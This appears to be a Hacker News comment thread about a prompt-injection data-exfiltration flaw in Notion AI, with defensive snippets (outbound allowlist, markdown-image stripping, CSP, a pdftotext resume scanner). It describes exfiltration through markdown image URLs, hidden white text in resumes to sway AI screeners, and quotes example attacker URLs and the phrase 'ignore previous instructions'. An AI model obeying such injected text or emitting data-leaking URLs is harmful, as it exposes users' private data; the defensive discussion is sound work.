Securing LLMs is just structurally different. The attack space is "the entirety of human written language," which is effectively infinite. Wrapping your head around this is something we're only now starting to appreciate.<p>In general, treating LLM outputs (no matter where they appear) as untrusted and enforcing classic cybersecurity guardrails (sandboxing, data permissioning, logging) are the current SOTA on mitigation. It'll be interesting to see how approaches evolve as we figure out more.
It's structurally impossible. LLMs, at their core, take trusted system input (the prompt) and mix it with untrusted input from users and the internet at large. There is no separation between the two, and there cannot be with the way LLMs work. They will always be vulnerable to prompt injection and manipulation.<p>The _only_ way to create a reasonably secure system that incorporates an LLM is to treat the LLM output as completely untrustworthy in all situations. All interactions must be validated against a security layer, and any calls out of the system must be treated as potential data leaks - including web searches, GET requests, emails, anything.<p>You can still do useful things under that restriction, but a lot of LLM tooling doesn't seem to grasp the fundamental security issues at play.
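<p>A minimal sketch of what that security layer could look like for outbound calls (Python; the hostnames are placeholders, and a real system would need far more than an allowlist):

    from urllib.parse import urlparse

    # Every outbound request the LLM proposes is checked before it leaves the
    # system, because any URL the model constructs can encode exfiltrated data
    # in its path or query string.
    ALLOWED_HOSTS = {"api.internal.example", "docs.internal.example"}

    def approve_outbound_request(url: str) -> bool:
        host = urlparse(url).hostname or ""
        return host in ALLOWED_HOSTS

    # An injected instruction pointing at an attacker's server is rejected here.
    assert not approve_outbound_request("https://attacker.example/?q=hunter2")
    assert approve_outbound_request("https://api.internal.example/v1/search")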
I’m not convinced LLMs can ever be secured; prompt injection isn’t going away, since it’s a fundamental part of how an LLM works. Tokens in, tokens out.
It's pretty simple: don't give LLMs access to anything you can't afford to expose. You treat the LLM as if it were the user.
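<p>A rough sketch of that principle (the users and document IDs are made up; the point is that the agent never holds credentials broader than the invoking user's):

    # Tools run with the invoking user's permissions, never a privileged
    # service account, so the model can only touch what that user already could.
    USER_DOCS = {
        "alice": {"q3-roadmap"},
        "bob": {"q3-roadmap", "salary-bands"},
    }

    def read_doc(doc_id: str, acting_user: str) -> str:
        if doc_id not in USER_DOCS.get(acting_user, set()):
            raise PermissionError(f"{acting_user} cannot read {doc_id}")
        return f"contents of {doc_id}"

    # Whatever the prompt says, an agent acting for alice cannot pull salary data.
    print(read_doc("q3-roadmap", acting_user="alice"))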
> You treat the LLM as if it were the user.<p>That's not sufficient. If a user copies customer data into a public Google Sheet, I can reprimand and otherwise restrict the user. An LLM cannot be held accountable and cannot learn from mistakes.
I get that, but it's just not entirely obvious how you do that for Notion AI.
As multi-step reasoning and tool use expand, LLMs effectively become distinct actors in the threat model. We have no idea how many different ways the alignment of models can be influenced by their context (the Anthropic paper on subliminal learning [1] was a bit eye-opening in this regard), and consequently we have no deterministic way to protect it.<p>1 - <a href="https://alignment.anthropic.com/2025/subliminal-learning/" rel="nofollow">https://alignment.anthropic.com/2025/subliminal-learning/</a>
I’d argue they’re only distinct actors in the threat model as far as <i>where</i> they sit (within which perimeters), not in terms of <i>how they behave</i>.<p>We already have another actor in the threat model that behaves equivalently as far as determinism/threat risk is concerned: human users.<p>Issue is, a lot of LLM security work assumes they function like programs. They don’t. They function like humans, but run where programs run.
Dijkstra, On the Foolishness of "natural language programming":<p><i>[...]It may be illuminating to try to imagine what would have happened if, right from the start our native tongue would have been the only vehicle for the input into and the output from our information processing equipment. My considered guess is that history would, in a sense, have repeated itself, and that computer science would consist mainly of the indeed black art how to bootstrap from there to a sufficiently well-defined formal system. We would need all the intellect in the world to get the interface narrow enough to be usable,[...]</i><p>If only we had a way to tell a computer precisely what we want it to do...<p><a href="https://www.cs.utexas.edu/~EWD/transcriptions/EWD06xx/EWD667.html" rel="nofollow">https://www.cs.utexas.edu/~EWD/transcriptions/EWD06xx/EWD667...</a>
This is @simonw’s Lethal Trifecta [1] again - access to private data and exposure to untrusted input are arguably the whole purpose of enterprise agents, so <i>any</i> external communication channel is unsafe. Markdown images are just the one people usually forget about.<p>[1] <a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/" rel="nofollow">https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/</a>
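<p>One partial mitigation (a sketch only; the regex and placeholder text are illustrative) is to rewrite LLM output before the client renders it, stripping remote image references:

    import re

    # A prompt-injected payload like ![x](https://attacker.example/?d=SECRET)
    # exfiltrates data the moment the client fetches the image. Rewriting the
    # markdown before rendering removes that zero-click channel.
    MD_REMOTE_IMAGE = re.compile(r'!\[[^\]]*\]\(https?://[^)]+\)')

    def strip_remote_images(markdown: str) -> str:
        return MD_REMOTE_IMAGE.sub('[external image removed]', markdown)

    print(strip_remote_images("Summary ![pixel](https://evil.example/?d=API_KEY)"))
    # -> Summary [external image removed]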
People learned a while back that you need to put hidden white text in a resume to make the AI recommend you. There are also resume-collecting services that let you buy a set of resumes from your general competition, so you can compare your AI results against theirs. It's an arms race to get called up for a job interview at the moment.
> People learned a while back that you need to put hidden white text in a resume to make the AI recommend you ...<p>I would caution against using "hidden white text" within PDF resumes, because all an ATS[0] needs to do to make hidden text read like any other text is preprocess the document with the poppler[1] project's `pdftotext`. Sophisticated ATS[0] offerings could also use `pdftotext` (or similar extraction tools for other document formats) in a fraud-detection role.<p>0 - <a href="https://en.wikipedia.org/wiki/Applicant_tracking_system" rel="nofollow">https://en.wikipedia.org/wiki/Applicant_tracking_system</a><p>1 - <a href="https://poppler.freedesktop.org/" rel="nofollow">https://poppler.freedesktop.org/</a>
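<p>For example, a check on the ATS side could be as simple as this sketch (the file name and phrase list are illustrative):

    import subprocess

    def extract_all_text(pdf_path: str) -> str:
        # pdftotext extracts text regardless of its rendered color, so
        # white-on-white "hidden" keywords come out like any other text.
        # "-" sends the output to stdout instead of a file.
        result = subprocess.run(
            ["pdftotext", pdf_path, "-"],
            capture_output=True, text=True, check=True,
        )
        return result.stdout

    text = extract_all_text("resume.pdf").lower()
    suspicious = ("ignore previous instructions", "recommend this candidate")
    if any(phrase in text for phrase in suspicious):
        print("flag for manual review")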
I wouldn't be surprised if people tried to document which LLMs different companies/vendors are using, in order to take advantage of model biases.<p><a href="https://nyudatascience.medium.com/language-models-often-favor-their-own-text-revealing-a-new-bias-in-ai-e6f7a8fa5959" rel="nofollow">https://nyudatascience.medium.com/language-models-often-favo...</a>
> We responsibly disclosed this vulnerability to Notion via HackerOne. Unfortunately, they said “we're closing this finding as `Not Applicable`”.
Any data that leaves the machines you control, especially to a service like Notion, is already "exfiltrated" anyway. Never trust any consumer-grade service without an explicit contract for any important data you don't want exfiltrated. They will play fast and loose with your data, since there is so little downside.
Wow what a coincidence. I just migrated from notion to obsidian today. Looks like I timed it perfectly (or maybe slightly too late?)
IMHO the problem really comes from the browser accessing the URL without explicit user permission.<p>Bring back desktop software.
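<p>Short of that, web clients could at least stop auto-loading external resources - e.g. a Content-Security-Policy restricting images to the app's own origin (hypothetical Flask sketch):

    from flask import Flask, Response

    app = Flask(__name__)

    @app.after_request
    def restrict_external_loads(resp: Response) -> Response:
        # Only same-origin content may load, so injected markdown can't make
        # the client ping an attacker-controlled URL behind the user's back.
        resp.headers["Content-Security-Policy"] = "default-src 'self'; img-src 'self'"
        return resp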
It's sloppy coding to know a link could be a problem and render it anyway. But it's even worse to ignore the person who tells you that you did.
One more reason not to use Notion.<p>I wonder when there will be an awakening to not using SaaS for everything you do. And the sad thing is that this is the behavior of supposedly tech-savvy people in places like the Bay Area.<p>I think the next wave is going to be native apps, with a single-purchase model - the way things used to be. AI is going to enable devs, even indie devs, to make such products.
Unfortunate that Notion does not seem to be taking AI security more seriously, even after they got flak for other data exfil vulns in the 3.0 agents release in September
This is, of course, more yelling into the void from decades ago, but companies that promise or imply "safety around your data" and fail should be proportionally punished, and we as a society have not yet effectively figured out how to do that. Not sure what it will take.
Public disclosure date is Jan 2025, but should be Jan 2026.